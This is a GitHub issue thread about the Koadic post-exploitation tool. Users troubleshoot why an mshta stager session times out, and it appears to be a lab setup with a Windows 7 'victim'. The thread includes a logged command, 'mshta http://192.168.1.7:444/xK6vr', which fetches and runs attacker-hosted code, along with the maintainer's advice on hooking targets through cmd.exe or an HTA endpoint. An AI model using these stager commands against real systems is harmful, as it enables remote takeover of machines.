### ISSUE TITLE
MSHTA DON'T WORKING \ Timed out /!\

### ISSUE THREAD

**Issue by Netw0rkLan** [zerosum0x0/koadic#20]
[>] mshta http://192.168.1.7:444/xK6vr
[+] Zombie 0: Staging new connection (10.0.2.2)
(koadic: stager/js/mshta)# zombies 0

        ID:                     0                               
        Status:                 Alive                           
        Last Seen:              2017-08-16 22:42:20             

        IP:                     10.0.2.2                        
        User:                                                   
        Hostname:                                               
        Primary DC:                                             
        OS:                                                     
        Elevated:               No                              

        User Agent:             Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0
        Session Key:            529273cd6ada41XXXXXXXXXXXXXXXX

        JOB  NAME                            STATUS  ERRNO   
        ---- ---------                       ------- ------- 

[!] Zombie 0: Timed out.

**Comment by zerosum0x0** [comment]
I see your user agent is Firefox so you are trying to run it from a browser. The only browser that has (full) support for ActiveX is Internet Explorer.

But the main way to hook is to go to cmd.exe and type in "mshta <url>"

**Comment by tugdualnicolas** [comment]
I have tried to use internet explorer and mshta but still time out (Host : Ubuntu 14.04.5 LTS "Victim" Wndows 7 x64)

**Comment by zerosum0x0** [comment]
Run it from the command line, not IE.

If you're trying IE, do the following for your stager URL:

`set ENDPOINT test.hta`

More recent versions of IE might have better blocking of HTA, not sure. But when I got it to work you had to click through a few "Yes, run ActiveX" prompts.
